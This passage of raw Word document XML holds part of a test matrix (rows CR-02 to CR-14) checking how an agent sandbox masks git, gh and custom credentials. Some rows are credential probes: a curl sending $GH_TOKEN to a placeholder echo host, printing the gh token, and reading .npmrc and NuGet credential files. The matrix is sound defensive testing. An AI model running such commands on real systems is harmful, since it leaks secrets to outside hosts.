              <w:t xml:space="preserve">✅ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">authenticategit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">gh CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">gh api user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">gh pr create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Only to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">github.com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">api.github.com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">uploads.github.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">authenticategh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Token visible to process?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">gh auth token</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / print </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">GH_TOKEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Placeholder</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Real token</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> printed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Token sent to another host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -H "Authorization: Bearer $GH_TOKEN" https://&lt;your-echo-host&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Echo receives </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Echo receives </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">real token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Git creds disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth.git: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / app toggle off / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">authenticategit: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; repeat CR-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Push fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">gh creds disabled</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth.gh: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; repeat CR-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ gh unauthenticated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Masked custom variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">credentials.envVars.ARTIFACTORY_TOKEN.injectHosts=["&lt;artifactory&gt;"]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npm ci</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + print the var</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Install works; printed value is placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 No documented setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 No documented user setting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Real value visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Masked var in body / URL / HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Send it in a POST body, query string, or plain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">http://</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Never</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> receives real value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Real value sent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Inject host not network-allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Inject host missing from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowedHosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Connection blocked — injection ≠ network allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Masking with local network OFF</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowLocalNetwork: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + masking on (git/gh defaults count)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Commands needing the proxy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">don't launch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Credential files on disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type %USERPROFILE%\.npmrc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">%APPDATA%\NuGet\NuGet.Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Readable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with dev-tool access ON — masking doesn't hide files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">SSH git remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git push</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git@github.com:…</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 No SSH injection documented; expect failure — standardise on HTTPS remotes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox CA trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Masking on; run a tool that trusts only the OS store (e.g. some Java/.NET clients)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ TLS error until CA trusted: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox ca create</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox ca trust</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Windows: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">admin, machine-wide</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox: Manage Trusted CA</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> → Install (admin on Windows). WSL uses per-process bundle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1108" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No proxy, no CA needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CR-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Pinning / HTTP2 / client certs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1771" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Run a tool with cert pinning or mTLS through an injected host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1601" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ May fail even with CA trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
